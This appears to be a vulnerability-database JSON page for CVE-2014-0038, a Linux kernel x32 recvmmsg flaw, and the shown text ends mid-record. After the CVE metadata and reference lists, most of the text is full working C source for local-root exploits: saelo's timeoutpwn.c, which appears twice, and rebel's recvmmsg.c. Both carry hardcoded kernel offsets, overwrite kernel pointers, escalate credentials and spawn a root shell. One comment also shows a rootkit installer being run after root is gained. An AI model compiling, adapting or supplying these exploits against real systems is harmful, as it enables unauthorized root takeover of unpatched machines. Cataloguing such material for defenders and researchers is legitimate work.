DATABASE RESOURCES PRICING ABOUT US

{"id": "DEBIANCVE:CVE-2014-0038", "vendorId": null, "type": "debiancve", "bulletinFamily": "info", "title": "CVE-2014-0038", "description": "The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.", "published": "2014-02-06T22:55:00", "modified": "2014-02-06T22:55:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 6.9}, "severity": "MEDIUM", "exploitabilityScore": 3.4, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {}, "href": "https://security-tracker.debian.org/tracker/CVE-2014-0038", "reporter": "Debian Security Bug Tracker", "references": [], "cvelist": ["CVE-2014-0038"], "immutableFields": [], "lastseen": "2022-07-04T06:00:34", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "canvas", "idList": ["RECVMMSG"]}, {"type": "cve", "idList": ["CVE-2014-0038"]}, {"type": "exploitdb", "idList": ["EDB-ID:31346", "EDB-ID:31347", "EDB-ID:40503"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9445C404D103D2E1671000556D6B6C63", "EXPLOITPACK:A17591892BC63AFE72FBBE4F30379F74"]}, {"type": "hackerone", "idList": ["H1:960"]}, {"type": "kitploit", "idList": ["KITPLOIT:3595538466348114827", "KITPLOIT:6178785369795464609"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/RECVMMSG_PRIV_ESC", "MSF:EXPLOIT/LINUX/LOCAL/RECVMMSG_PRIV_ESC/"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1477.NASL", "EULEROS_SA-2019-1538.NASL", "MANDRIVA_MDVSA-2014-038.NASL", "OPENSUSE-2014-113.NASL", "OPENSUSE-2014-114.NASL", "ORACLELINUX_ELSA-2014-3034.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "SLACKWARE_SSA_2014-050-03.NASL", "SUSE_SU-2017-3210-1.NASL", "SUSE_SU-2017-3249-1.NASL", "UBUNTU_USN-2094-1.NASL", "UBUNTU_USN-2095-1.NASL", "UBUNTU_USN-2096-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123411", "OPENVAS:1361412562310841697", "OPENVAS:1361412562310841698", "OPENVAS:1361412562310841700", "OPENVAS:1361412562310850565", "OPENVAS:1361412562310850566", "OPENVAS:1361412562311220191477", "OPENVAS:1361412562311220191538", "OPENVAS:841697", "OPENVAS:841698", "OPENVAS:841700", "OPENVAS:850565", "OPENVAS:850566"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-3034"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125033", "PACKETSTORM:139049"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30268", "SECURITYVULNS:DOC:30313", "SECURITYVULNS:VULN:13475"]}, {"type": "seebug", "idList": ["SSV:84682", "SSV:84683"]}, {"type": "slackware", "idList": ["SSA-2014-050-03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0204-1", "OPENSUSE-SU-2014:0205-1", "SUSE-SU-2017:3210-1", "SUSE-SU-2017:3249-1"]}, {"type": "ubuntu", "idList": ["USN-2094-1", "USN-2095-1", "USN-2096-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-0038"]}, {"type": "zdt", "idList": ["1337DAY-ID-21851", "1337DAY-ID-21852", "1337DAY-ID-25496"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-0038"]}, {"type": "exploitdb", "idList": ["EDB-ID:31346"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A17591892BC63AFE72FBBE4F30379F74"]}, {"type": "hackerone", "idList": ["H1:960"]}, {"type": "kitploit", "idList": ["KITPLOIT:6178785369795464609"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/RECVMMSG_PRIV_ESC"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2014-038.NASL", "SUSE_SU-2017-3249-1.NASL", "UBUNTU_USN-2095-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310841698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139049"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30268"]}, {"type": "seebug", "idList": ["SSV:84683"]}, {"type": "slackware", "idList": ["SSA-2014-050-03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0204-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-0038"]}, {"type": "zdt", "idList": ["1337DAY-ID-21852"]}]}, "exploitation": null, "vulnersScore": 6.9}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "affectedPackage": [{"OS": "Debian", "OSVersion": "12", "arch": "all", "packageFilename": "linux_5.18.5-1_all.deb", "packageVersion": "5.18.5-1", "operator": "lt", "status": "resolved", "packageName": "linux"}, {"OS": "Debian", "OSVersion": "11", "arch": "all", "packageFilename": "linux_5.10.106-1_all.deb", "packageVersion": "5.10.106-1", "operator": "lt", "status": "resolved", "packageName": "linux"}, {"OS": "Debian", "OSVersion": "10", "arch": "all", "packageFilename": "linux_4.19.235-1_all.deb", "packageVersion": "4.19.235-1", "operator": "lt", "status": "resolved", "packageName": "linux"}, {"OS": "Debian", "OSVersion": "999", "arch": "all", "packageFilename": "linux_5.18.5-1_all.deb", "packageVersion": "5.18.5-1", "operator": "lt", "status": "resolved", "packageName": "linux"}]}

{"canvas": [{"lastseen": "2021-07-28T14:33:35", "description": "**Name**| recvmmsg \n---|--- \n**CVE**| CVE-2014-0038 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| recvmmsg local root \n**Notes**| Repeatability: Infinite \nNotes: \n \nTested on: \n\\- Ubuntu 13.10 x86_64 3.11.0-12-generic \n \n \nVENDOR: GNU/Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038 \nCVE Name: CVE-2014-0038 \n\n", "edition": 3, "cvss3": {}, "published": "2014-02-06T22:55:00", "type": "canvas", "title": "Immunity Canvas: RECVMMSG", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-06T22:55:00", "id": "RECVMMSG", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/recvmmsg", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.4 3.13.2 (Ubuntu 13.10) - CONFIG_X86_X32 Arbitrary Write (2)", "edition": 2, "cvss3": {}, "published": "2014-02-02T00:00:00", "title": "Linux Kernel 3.4 3.13.2 (Ubuntu 13.10) - CONFIG_X86_X32 Arbitrary Write (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "EXPLOITPACK:A17591892BC63AFE72FBBE4F30379F74", "href": "", "sourceData": "/*\n * Local root exploit for CVE-2014-0038.\n *\n * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c\n *\n * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer\n * passed from userspace.\n *\n * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,\n * if the original byte at that address is known it can be overwritten\n * with known data.\n * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.\n *\n * Restrictions: The first long at the passed address (tv_sec) has to be positive\n * and the second long (tv_nsec) has to be smaller than 1000000000.\n *\n * Overview: Target the release function pointer of the ptmx_fops structure located in\n * non initialized (and thus writable) kernel memory. Zero out the three most\n * significant bytes and thus turn it into a pointer to an address mappable in\n * user space.\n * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec\n * is valid).\n * Open /dev/ptmx, close it and enjoy.\n *\n * Not very beautiful but should be fairly reliable if symbols can be resolved.\n *\n * Tested on Ubuntu 13.10\n *\n * gcc timeoutpwn.c -o pwn && ./pwn\n *\n * Written by saelo\n */\n#define _GNU_SOURCE\n#include <netinet/ip.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <sys/wait.h>\n#include <sys/mman.h>\n\n#define __X32_SYSCALL_BIT 0x40000000\n#undef __NR_recvmmsg\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\n\n#define BUFSIZE 200\n#define PAYLOADSIZE 0x2000\n#define FOPS_RELEASE_OFFSET 13*8\n\n/*\n * Adapt these addresses for your need.\n * see /boot/System.map* or /proc/kallsyms\n * These are the offsets from ubuntu 3.11.0-12-generic.\n */\n#define PTMX_FOPS 0xffffffff81fb30c0LL\n#define TTY_RELEASE 0xffffffff8142fec0LL\n#define COMMIT_CREDS 0xffffffff8108ad40LL\n#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n\n/*\n * Match signature of int release(struct inode*, struct file*).\n *\n * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz\n */\nint __attribute__((regparm(3)))\nkernel_payload(void* foo, void* bar)\n{\n _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\n _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\n\n *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer\n commit_creds(prepare_kernel_cred(0));\n\n return -1;\n}\n\n/*\n * Write a zero to the byte at then given address.\n * Only works if the current value is 0xff.\n */\nvoid zero_out(long addr)\n{\n int sockfd, retval, port, pid, i;\n struct sockaddr_in sa;\n char buf[BUFSIZE];\n struct mmsghdr msgs;\n struct iovec iovecs;\n\n srand(time(NULL));\n\n port = 1024 + (rand() % (0x10000 - 1024));\n\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\n if (sockfd == -1) {\n perror(\"socket()\");\n exit(EXIT_FAILURE);\n }\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\n perror(\"bind()\");\n exit(EXIT_FAILURE);\n }\n\n memset(&msgs, 0, sizeof(msgs));\n iovecs.iov_base = buf;\n iovecs.iov_len = BUFSIZE;\n msgs.msg_hdr.msg_iov = &iovecs;\n msgs.msg_hdr.msg_iovlen = 1;\n\n /*\n * start a seperate process to send a udp message after 255 seconds so the syscall returns,\n * but not after updating the timout struct and writing the remaining time into it.\n * 0xff - 255 seconds = 0x00\n */\n printf(\"clearing byte at 0x%lx\\n\", addr);\n pid = fork();\n if (pid == 0) {\n memset(buf, 0x41, BUFSIZE);\n\n if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {\n perror(\"socket()\");\n exit(EXIT_FAILURE);\n }\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n\n printf(\"waiting 255 seconds...\\n\");\n for (i = 0; i < 255; i++) {\n if (i % 10 == 0)\n printf(\"%is/255s\\n\", i);\n sleep(1);\n }\n\n printf(\"waking up parent...\\n\");\n sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));\n exit(EXIT_SUCCESS);\n } else if (pid > 0) {\n retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);\n if (retval == -1) {\n printf(\"address can't be written to, not a valid timespec struct\\n\");\n exit(EXIT_FAILURE);\n }\n waitpid(pid, 0, 0);\n printf(\"byte zeroed out\\n\");\n } else {\n perror(\"fork()\");\n exit(EXIT_FAILURE);\n }\n}\n\nint main(int argc, char** argv)\n{\n long code, target;\n int pwn;\n\n /* Prepare payload... */\n printf(\"preparing payload buffer...\\n\");\n code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);\n memset((void*)code, 0x90, PAYLOADSIZE);\n code += PAYLOADSIZE - 1024;\n memcpy((void*)code, &kernel_payload, 1024);\n\n /*\n * Now clear the three most significant bytes of the fops pointer\n * to the release function.\n * This will make it point into the memory region mapped above.\n */\n printf(\"changing kernel pointer to point into controlled buffer...\\n\");\n target = PTMX_FOPS + FOPS_RELEASE_OFFSET;\n zero_out(target + 7);\n zero_out(target + 6);\n zero_out(target + 5);\n\n /* ... and trigger. */\n printf(\"releasing file descriptor to call manipulated pointer in kernel mode...\\n\");\n pwn = open(\"/dev/ptmx\", 'r');\n close(pwn);\n\n if (getuid() != 0) {\n printf(\"failed to get root :(\\n\");\n exit(EXIT_FAILURE);\n }\n\n printf(\"got root, enjoy :)\\n\");\n return execl(\"/bin/bash\", \"-sh\", NULL);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.4 3.13.2 (Ubuntu 13.0413.10 x64) - CONFIG_X86_X32y Local Privilege Escalation (3)", "edition": 2, "cvss3": {}, "published": "2014-02-02T00:00:00", "title": "Linux Kernel 3.4 3.13.2 (Ubuntu 13.0413.10 x64) - CONFIG_X86_X32y Local Privilege Escalation (3)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "EXPLOITPACK:9445C404D103D2E1671000556D6B6C63", "href": "", "sourceData": "/* \n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\nrecvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\nCVE-2014-0038 / x32 ABI with recvmmsg\nby rebel @ irc.smashthestack.org\n-----------------------------------\n\ntakes about 13 minutes to run because timeout->tv_sec is decremented\nonce per second and 0xff*3 is 765.\n\nsome things you could do while waiting:\n * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times\n * read https://wiki.ubuntu.com/Security/Features and smirk a few times\n * brew some coffee\n * stare at the countdown giggly with anticipation\n\ncould probably whack the high bits of some pointer with nanoseconds,\nbut that would require a bunch of nulls before the pointer and then\nreading an oops from dmesg which isn't that elegant.\n\n&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes\n\nhardcoded offsets because I only saw this on ubuntu & kallsyms is protected\nanyway..\n\nsame principle will work on 32bit but I didn't really find any major\ndistros shipping with CONFIG_X86_X32=y\n\nuser@ubuntu:~$ uname -a\nLinux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\nuser@ubuntu:~$ gcc recvmmsg.c -o recvmmsg\nuser@ubuntu:~$ ./recvmmsg\nbyte 3 / 3.. ~0 secs left. \nw00p w00p!\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# sh phalanx-2.6b-x86_64.sh\nunpacking..\n\n:)=\n\ngreets to my homeboys kaliman, beist, capsl & all of #social\n\nSat Feb 1 22:15:19 CET 2014\n% rebel %\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\n*/\n\n#define _GNU_SOURCE\n#include <netinet/ip.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <unistd.h>\n#include <sys/syscall.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <sys/utsname.h>\n\n#define __X32_SYSCALL_BIT 0x40000000\n#undef __NR_recvmmsg\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\n#define VLEN 1\n#define BUFSIZE 200\n\nint port;\n\nstruct offset {\n char *kernel_version;\n unsigned long dest; // net_sysctl_root + 96\n unsigned long original_value; // net_ctl_permissions\n unsigned long prepare_kernel_cred;\n unsigned long commit_creds;\n};\n\nstruct offset offsets[] = {\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\n {NULL,0,0,0,0}\n};\n\nvoid udp(int b) {\n int sockfd;\n struct sockaddr_in servaddr,cliaddr;\n int s = 0xff+1;\n\n if(fork() == 0) {\n while(s > 0) {\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\n sleep(1);\n s--;\n fprintf(stderr,\".\");\n }\n\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\n bzero(&servaddr,sizeof(servaddr));\n servaddr.sin_family = AF_INET;\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\n servaddr.sin_port=htons(port);\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\n exit(0);\n }\n\n}\n\nvoid trigger() {\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\n\n if(getuid() != 0) {\n fprintf(stderr,\"not root, ya blew it!\\n\");\n exit(-1);\n }\n\n fprintf(stderr,\"w00p w00p!\\n\");\n system(\"/bin/sh -i\");\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n// thx bliss\nstatic int __attribute__((regparm(3)))\ngetroot(void *head, void * table)\n{\n commit_creds(prepare_kernel_cred(0));\n return -1;\n}\n\nvoid __attribute__((regparm(3)))\ntrampoline()\n{\n asm(\"mov $getroot, %rax; call *%rax;\");\n}\n\nint main(void)\n{\n int sockfd, retval, i;\n struct sockaddr_in sa;\n struct mmsghdr msgs[VLEN];\n struct iovec iovecs[VLEN];\n char buf[BUFSIZE];\n long mmapped;\n struct utsname u;\n struct offset *off = NULL;\n\n uname(&u);\n\n for(i=0;offsets[i].kernel_version != NULL;i++) {\n if(!strcmp(offsets[i].kernel_version,u.release)) {\n off = &offsets[i];\n break;\n }\n }\n\n if(!off) {\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\n exit(-1);\n }\n\n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\n mmapped &= 0x000000ffffffffff;\n\n srand(time(NULL));\n port = (rand() % 30000)+1500;\n\n commit_creds = (_commit_creds)off->commit_creds;\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\n\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\n\n if(mmapped == -1) {\n perror(\"mmap()\");\n exit(-1);\n }\n\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\n\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\n\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\n perror(\"mprotect()\");\n exit(-1);\n }\n \n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\n if (sockfd == -1) {\n perror(\"socket()\");\n exit(-1);\n }\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\n perror(\"bind()\");\n exit(-1);\n }\n\n memset(msgs, 0, sizeof(msgs));\n\n iovecs[0].iov_base = &buf;\n iovecs[0].iov_len = BUFSIZE;\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\n msgs[0].msg_hdr.msg_iovlen = 1;\n\n for(i=0;i < 3 ;i++) {\n udp(i);\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\n if(!retval) {\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\n }\n }\n\n close(sockfd); \n\n fprintf(stderr,\"\\n\");\n\n trigger();\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:35", "description": "", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "packetstorm", "title": "X86_X32 recvmmsg Arbitrary Write Local Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-03T00:00:00", "id": "PACKETSTORM:125033", "href": "https://packetstormsecurity.com/files/125033/X86_X32-recvmmsg-Arbitrary-Write-Local-Root.html", "sourceData": "`/* \n* Local root exploit for CVE-2014-0038. \n* \n* https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c \n* \n* Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer \n* passed from userspace. \n* \n* Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg, \n* if the original byte at that address is known it can be overwritten \n* with known data. \n* If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00. \n* \n* Restrictions: The first long at the passed address (tv_sec) has to be positive \n* and the second long (tv_nsec) has to be smaller than 1000000000. \n* \n* Overview: Target the release function pointer of the ptmx_fops structure located in \n* non initialized (and thus writable) kernel memory. Zero out the three most \n* significant bytes and thus turn it into a pointer to an address mappable in \n* user space. \n* The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec \n* is valid). \n* Open /dev/ptmx, close it and enjoy. \n* \n* Not very beautiful but should be fairly reliable if symbols can be resolved. \n* \n* Tested on Ubuntu 13.10 \n* \n* gcc timeoutpwn.c -o pwn && ./pwn \n* \n* Written by saelo \n*/ \n#define _GNU_SOURCE \n#include <netinet/ip.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <time.h> \n#include <string.h> \n#include <unistd.h> \n#include <fcntl.h> \n#include <sys/socket.h> \n#include <sys/stat.h> \n#include <sys/syscall.h> \n#include <sys/wait.h> \n#include <sys/mman.h> \n \n#define __X32_SYSCALL_BIT 0x40000000 \n#undef __NR_recvmmsg \n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) \n \n#define BUFSIZE 200 \n#define PAYLOADSIZE 0x2000 \n#define FOPS_RELEASE_OFFSET 13*8 \n \n/* \n* Adapt these addresses for your need. \n* see /boot/System.map* or /proc/kallsyms \n* These are the offsets from ubuntu 3.11.0-12-generic. \n*/ \n#define PTMX_FOPS 0xffffffff81fb30c0LL \n#define TTY_RELEASE 0xffffffff8142fec0LL \n#define COMMIT_CREDS 0xffffffff8108ad40LL \n#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); \n \n/* \n* Match signature of int release(struct inode*, struct file*). \n* \n* See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz \n*/ \nint __attribute__((regparm(3))) \nkernel_payload(void* foo, void* bar) \n{ \n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; \n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; \n \n*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer \ncommit_creds(prepare_kernel_cred(0)); \n \nreturn -1; \n} \n \n/* \n* Write a zero to the byte at then given address. \n* Only works if the current value is 0xff. \n*/ \nvoid zero_out(long addr) \n{ \nint sockfd, retval, port, pid, i; \nstruct sockaddr_in sa; \nchar buf[BUFSIZE]; \nstruct mmsghdr msgs; \nstruct iovec iovecs; \n \nsrand(time(NULL)); \n \nport = 1024 + (rand() % (0x10000 - 1024)); \n \nsockfd = socket(AF_INET, SOCK_DGRAM, 0); \nif (sockfd == -1) { \nperror(\"socket()\"); \nexit(EXIT_FAILURE); \n} \n \nsa.sin_family = AF_INET; \nsa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); \nsa.sin_port = htons(port); \nif (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { \nperror(\"bind()\"); \nexit(EXIT_FAILURE); \n} \n \nmemset(&msgs, 0, sizeof(msgs)); \niovecs.iov_base = buf; \niovecs.iov_len = BUFSIZE; \nmsgs.msg_hdr.msg_iov = &iovecs; \nmsgs.msg_hdr.msg_iovlen = 1; \n \n/* \n* start a seperate process to send a udp message after 255 seconds so the syscall returns, \n* but not after updating the timout struct and writing the remaining time into it. \n* 0xff - 255 seconds = 0x00 \n*/ \nprintf(\"clearing byte at 0x%lx\\n\", addr); \npid = fork(); \nif (pid == 0) { \nmemset(buf, 0x41, BUFSIZE); \n \nif ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { \nperror(\"socket()\"); \nexit(EXIT_FAILURE); \n} \n \nsa.sin_family = AF_INET; \nsa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); \nsa.sin_port = htons(port); \n \nprintf(\"waiting 255 seconds...\\n\"); \nfor (i = 0; i < 255; i++) { \nif (i % 10 == 0) \nprintf(\"%is/255s\\n\", i); \nsleep(1); \n} \n \nprintf(\"waking up parent...\\n\"); \nsendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); \nexit(EXIT_SUCCESS); \n} else if (pid > 0) { \nretval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); \nif (retval == -1) { \nprintf(\"address can't be written to, not a valid timespec struct\\n\"); \nexit(EXIT_FAILURE); \n} \nwaitpid(pid, 0, 0); \nprintf(\"byte zeroed out\\n\"); \n} else { \nperror(\"fork()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nint main(int argc, char** argv) \n{ \nlong code, target; \nint pwn; \n \n/* Prepare payload... */ \nprintf(\"preparing payload buffer...\\n\"); \ncode = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0); \nmemset((void*)code, 0x90, PAYLOADSIZE); \ncode += PAYLOADSIZE - 1024; \nmemcpy((void*)code, &kernel_payload, 1024); \n \n/* \n* Now clear the three most significant bytes of the fops pointer \n* to the release function. \n* This will make it point into the memory region mapped above. \n*/ \nprintf(\"changing kernel pointer to point into controlled buffer...\\n\"); \ntarget = PTMX_FOPS + FOPS_RELEASE_OFFSET; \nzero_out(target + 7); \nzero_out(target + 6); \nzero_out(target + 5); \n \n/* ... and trigger. */ \nprintf(\"releasing file descriptor to call manipulated pointer in kernel mode...\\n\"); \npwn = open(\"/dev/ptmx\", 'r'); \nclose(pwn); \n \nif (getuid() != 0) { \nprintf(\"failed to get root :(\\n\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"got root, enjoy :)\\n\"); \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125033/x86_x32-localroot.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:07", "description": "", "cvss3": {}, 